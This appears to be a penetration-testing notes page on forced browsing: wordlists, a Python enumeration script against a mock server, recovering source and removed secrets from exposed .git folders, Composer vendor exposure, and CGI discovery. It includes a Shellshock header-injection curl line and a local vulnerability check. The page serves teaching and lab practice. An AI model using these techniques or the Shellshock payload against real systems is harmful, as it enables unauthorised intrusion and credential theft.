Forced Browsing

contentdiscovery adventofcyber2 webenumerationv2 sqlmap picklerick vulnversity basicpentestingjt blaster rrootme startup wgelctf allinonemj mustacchio chillhack githappens lianyu easypeasyctf gamingserver cyborgt8 md2pdf surfer bruteit archangel teamcw pythonplayground techsupp0rt1 nax nibbles devvortex cozyhosting bashed blocky backup_file php_register_globals

Forced browsing is a technique in which we request URLs crafted from a list of common file and folder names, looking for resources that the server still serves even though nothing on the site links to them:

  • 🧃 Configuration files (ex: .config)
  • 👀 Old files (ex: index.php.old)
  • 💵 Backup files (ex: xxx.bak, backup.xxx, xxx~)
  • 🔑 Admin/CMS panels (ex: WordPress admin login page, /wp-login.php)
  • 💰 Private files (ex: documents...)

Refer to wordlists#forced browsing for wordlists. ⚠️ Start with small wordlists, then move to bigger ones. They don't have the same entries: a large list is not a superset of a small one, so a hit from one may never appear in the other.

Common tools are:

For extensions, a useful starting set is: php,html,txt,sql,bak,tar,tar.gz,db,zip,sqlite. Also test the bare name: a request for index.php.old is a different probe from index.old.
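The loop above (wordlist × extensions, keep anything that is not the site's 404) as an added example, not code from the page or from any of the tools it lists. It spins up a throwaway local HTTP server with a constructed set of paths so it runs offline; against a real target only force_browse(base_url) would be used. Two details matter in practice and are handled here: redirects are not followed (a 301 on /admin is itself the finding), and a random path is requested first so that a site answering 200 to everything ("soft 404") does not produce a hit for every word.

```python
"""Forced browsing against a throwaway local server (added example)."""
import http.server
import itertools
import secrets
import threading
import urllib.error
import urllib.request

# Constructed sample site. Real targets are enumerated with the wordlists above.
SITE = {
    "/index.php": (200, b"<html>home</html>"),
    "/index.php.old": (200, b"<?php $db_pass = 'hunter2';"),  # old copy left behind
    "/backup.zip": (200, b"PK\x03\x04" + b"\x00" * 16),        # backup archive
    "/config.php": (200, b""),                                # runs, prints nothing
    "/.git/": (403, b"Forbidden"),                            # listing blocked...
    "/.git/HEAD": (200, b"ref: refs/heads/master\n"),         # ...the files are not
    "/admin": (301, b""),                                     # redirect hints at a panel
}
WORDLIST = ["index", "config", "backup", "admin", "uploads", "login", ".git"]
EXTENSIONS = ["", ".php", ".php.old", ".bak", ".zip", ".sql", ".txt", "/", "/HEAD"]


class _Handler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        status, body = SITE.get(self.path, (404, b"custom not found page"))
        self.send_response(status)
        if status == 301:
            self.send_header("Location", "/admin/login")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the output quiet
        pass


def start_server():
    """Start the sample site on a random loopback port; returns (server, base_url)."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), _Handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"


def probe(url):
    """Return (status, body_length) for one URL, without following redirects."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, *args, **kwargs):
            return None  # makes urllib raise HTTPError(301/302) instead of following

    opener = urllib.request.build_opener(NoRedirect)
    try:
        with opener.open(url, timeout=5) as r:
            return r.status, len(r.read())
    except urllib.error.HTTPError as e:
        return e.code, len(e.read())


def force_browse(base, words=WORDLIST, exts=EXTENSIONS):
    """Return {path: (status, size)} for every word+extension that is not a 404."""
    # Baseline: a random path shows what this site's "not found" looks like, so a
    # soft 404 (200 with the same body size) is not reported as a hit.
    not_found = probe(f"{base}/{secrets.token_hex(8)}")
    hits = {}
    for word, ext in itertools.product(words, exts):
        path = f"/{word}{ext}"
        status, size = probe(base + path)
        if status == 404 or (status, size) == not_found:
            continue
        hits[path] = (status, size)
    return hits


if __name__ == "__main__":
    server, base_url = start_server()
    for found, (code, length) in sorted(force_browse(base_url).items()):
        print(f"{code} {length:>6} {found}")
    server.shutdown()
```

Note the 403 on /.git/ and the 200 on /.git/HEAD in the output: this is the partial-exposure pattern discussed under version control files below, and the 403 is worth keeping rather than filtering out.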


Additional Notes

Version Control Files Disclosure

githappens insecure_code_management starbug_bounty

Sometimes, version control files such as .git for Git may be exposed. They can be used to recover the current version of the code and every previous one, including files and credentials that were later removed. For instance, after downloading a .git into a folder named dump:

$ cd dump                    # the folder that contains .git, not .git itself
$ git status                 # every tracked file shows as deleted: only .git was fetched
$ git restore .              # rebuild the working tree from the index
$ git log --all --oneline    # history, including other branches
$ git log -p -- config.php   # look at config.php history (removed secrets show as '-' lines)
$ git show commit_id         # inspect one commit

A few automated tools: GitHacker (1.4k ⭐, 2023 🪦), GitTools (3.8k ⭐, 2022 🪦, 👻), GitHack (3.1k ⭐, 2022 🪦) and git-dumper (1.8k ⭐).

$ DEST="$HOME/tools/gitdumper"
$ git clone -b "master" https://github.com/arthaud/git-dumper $DEST
$ python3 "$DEST/git_dumper.py" URL/.git/ dump   # or: pip install git-dumper && git-dumper URL/.git/ dump

📚 .git may be blocked (403) but .git/index, .git/HEAD, etc. may not. A 403 on the directory usually only means directory listing is off; the files inside are still served when requested by name, and tools like git-dumper rely on exactly that (they read .git/index and .git/refs to learn which objects to fetch).

⚠️ We are downloading potentially harmful files. This is dangerous as it may lead to RCE: .git/config can point core.fsmonitor, core.pager or core.sshCommand at an arbitrary command, and anything in .git/hooks runs on ordinary git operations. Manually check .git/config and .git/hooks before running any git command in the dump!
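The partial-exposure case from the note above (directory listing blocked, individual files readable) can also be worked by hand, which is useful when the dumper tools fail: .git/index lists every tracked path together with its blob hash, and each blob is a zlib-compressed loose object at .git/objects/xx/yyyy.... The following is an added example, not code from the page or from any of the tools it lists. The index bytes and the two PHP files are constructed sample data, and fetch() stands in for HTTP GETs under .git/. Only version-2 indexes (the default one git writes) are handled, and objects that only exist in packfiles are skipped.

```python
"""Parse an exposed .git/index and inflate loose objects (added example)."""
import hashlib
import struct
import zlib


def git_object(kind, content):
    """Return (sha1_hex, zlib_bytes) for a loose object exactly as git stores it."""
    raw = b"%s %d\0" % (kind.encode(), len(content)) + content
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def build_index_v2(entries):
    """Constructed sample: serialise a minimal version-2 index for (path, sha1_hex, mode)."""
    body = b"DIRC" + struct.pack(">II", 2, len(entries))
    for path, sha_hex, mode in entries:
        name = path.encode()
        # ctime, ctime_ns, mtime, mtime_ns, dev, ino, mode, uid, gid, size (all zero but mode)
        stat = struct.pack(">10I", 0, 0, 0, 0, 0, 0, mode, 0, 0, 0)
        entry = stat + bytes.fromhex(sha_hex) + struct.pack(">H", len(name)) + name + b"\0"
        entry += b"\0" * (-len(entry) % 8)  # entries are padded to a multiple of 8 bytes
        body += entry
    return body + hashlib.sha1(body).digest()  # trailing checksum over everything before it


def parse_index(data):
    """Return [(path, sha1_hex, mode)] from a version-2 index; checks magic and checksum."""
    if data[:4] != b"DIRC":
        raise ValueError("not a git index")
    if hashlib.sha1(data[:-20]).digest() != data[-20:]:
        raise ValueError("index checksum mismatch (truncated download?)")
    version, count = struct.unpack(">II", data[4:12])
    if version != 2:
        raise ValueError(f"index version {version} not handled here")
    pos, entries = 12, []
    for _ in range(count):
        mode = struct.unpack(">I", data[pos + 24:pos + 28])[0]
        sha = data[pos + 40:pos + 60].hex()
        flags = struct.unpack(">H", data[pos + 60:pos + 62])[0]
        namelen = flags & 0x0FFF            # low 12 bits of the flags word
        name = data[pos + 62:pos + 62 + namelen].decode()
        entries.append((name, sha, mode))
        entry_len = 62 + namelen + 1        # fixed part + name + NUL
        pos += entry_len + (-entry_len % 8)
    return entries


def recover_files(index_bytes, fetch):
    """fetch(path_under_dot_git) -> bytes or None; returns {tracked_path: content}."""
    recovered = {}
    for path, sha, _mode in parse_index(index_bytes):
        blob = fetch(f"objects/{sha[:2]}/{sha[2:]}")
        if blob is None:
            continue  # not a loose object: it lives in a packfile, or the GET failed
        raw = zlib.decompress(blob)
        if hashlib.sha1(raw).hexdigest() != sha:
            raise ValueError(f"object {sha} does not hash to its name")
        header, _, content = raw.partition(b"\0")
        kind, size = header.split(b" ")
        if kind != b"blob" or int(size) != len(content):
            raise ValueError(f"unexpected object header {header!r}")
        recovered[path] = content
    return recovered


# Constructed sample repository: two loose blobs plus one entry whose object is absent.
CONFIG_PHP = b"<?php $db_pass = 'constructed-sample-password';"
INDEX_PHP = b"<?php require 'config.php';"
_cfg_sha, _cfg_obj = git_object("blob", CONFIG_PHP)
_idx_sha, _idx_obj = git_object("blob", INDEX_PHP)
_missing_sha = git_object("blob", b"only in a packfile")[0]
FAKE_DOT_GIT = {
    f"objects/{_cfg_sha[:2]}/{_cfg_sha[2:]}": _cfg_obj,
    f"objects/{_idx_sha[:2]}/{_idx_sha[2:]}": _idx_obj,
}
SAMPLE_INDEX = build_index_v2([
    ("config.php", _cfg_sha, 0o100644),
    ("index.php", _idx_sha, 0o100644),
    ("packed.txt", _missing_sha, 0o100644),
])

if __name__ == "__main__":
    for path, content in recover_files(SAMPLE_INDEX, FAKE_DOT_GIT.get).items():
        print(path, content.decode())
```

Against a live target, fetch() would be an HTTP GET of URL/.git/ plus the relative path; the checksum on the index and the hash check on every object are what tell a clean dump from a truncated or tampered one.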

Composer Vendor Folder Exposure

surfer

Composer is a package manager for PHP. From composer.json, it creates a vendor folder with the PHP packages, and records the exact installed versions in vendor/composer/installed.json (and in composer.lock next to composer.json).

This folder should not be available for remote users: it discloses the precise dependency versions to match against known vulnerabilities, and third-party packages may ship scripts or examples that were never meant to be reachable over HTTP.

CGI Scripts

attacking_common_applications adventofcyber2 shocker

Common Gateway Interface (CGI) applications are rarely used nowadays as they are dangerous: the web server runs an external program for every request and hands it the request data through environment variables (the User-Agent header becomes HTTP_USER_AGENT, and so on), so user input reaches the process environment directly. They were often used to glue applications together. CGI scripts can be written in many languages. They have a few advantages and many major disadvantages. To look for them:

$ ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u URL/cgi/FUZZ -e .bat,.cmd
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u URL/cgi-bin/FUZZ -e .cgi,.pl,.c,.sh,.py

πŸ“š Apache Tomcat returns 404 for /cgi even when it exists.

⚠️ Unpatched Bash up to and including 4.3 has a vulnerability called Shellshock (CVE-2014-6271): a function definition placed in any environment variable, such as one built from a request header, is parsed and the commands after it are executed. It can also be exploited with Metasploit (apache_mod_cgi_bash_env_exec):

$ curl -H 'User-Agent: () { :; }; <write code here>' 'URL/cgi-bin/some_script'

The CGI process usually has a minimal PATH, so use absolute paths (/usr/bin/id), and start the payload with `echo;` so the output forms a valid CGI response body.
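Why a request header is enough to reach bash, as an added example (not code from the page or from Metasploit): cgi_env() applies the header-to-environment mapping a CGI server performs (RFC 3875: name upper-cased, hyphens to underscores, HTTP_ prefix), and bash_imports_functions() reproduces the classic local check `env x='() { :;}; echo vulnerable' bash -c 'echo test'` against whatever bash is on PATH. The marker string and header set are constructed for the example; nothing is sent over the network.

```python
"""CGI header-to-environment mapping and a local Shellshock check (added example)."""
import shutil
import subprocess


def cgi_env(headers):
    """Map HTTP headers to CGI environment variables as a server does (RFC 3875)."""
    env = {}
    for name, value in headers.items():
        key = name.upper().replace("-", "_")
        # Content-Type and Content-Length are passed without the HTTP_ prefix.
        if key in ("CONTENT_TYPE", "CONTENT_LENGTH"):
            env[key] = value
        else:
            env["HTTP_" + key] = value
    return env


# Constructed probe: an empty function body followed by a command, the Shellshock shape.
SHELLSHOCK_MARKER = "() { :; }; echo SHELLSHOCKED"


def bash_imports_functions(bash=None):
    """True if the local bash executes the trailing command while importing an
    attacker-shaped env var (CVE-2014-6271), False if patched, None if no bash."""
    bash = bash or shutil.which("bash")
    if bash is None:
        return None
    env = cgi_env({"User-Agent": SHELLSHOCK_MARKER})
    # A vulnerable bash prints SHELLSHOCKED while parsing HTTP_USER_AGENT at startup,
    # before 'echo test' ever runs; a patched bash only prints 'test'.
    proc = subprocess.run([bash, "-c", "echo test"], env=env,
                          capture_output=True, text=True)
    return "SHELLSHOCKED" in proc.stdout


if __name__ == "__main__":
    print(cgi_env({"User-Agent": SHELLSHOCK_MARKER, "Content-Type": "text/plain"}))
    print("local bash vulnerable:", bash_imports_functions())
```

The same mapping explains the ffuf filenames above: anything a CGI script reads from its environment (Cookie, Referer, Accept) is attacker-controlled, Shellshock being the case where the shell itself, not the script, does the unsafe parsing.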

👻 To-do 👻

Stuff that I found, but never read/used yet.

blocky

  • AJAX rendered page, automation?
  • .DS_Store, contains a list of files, blog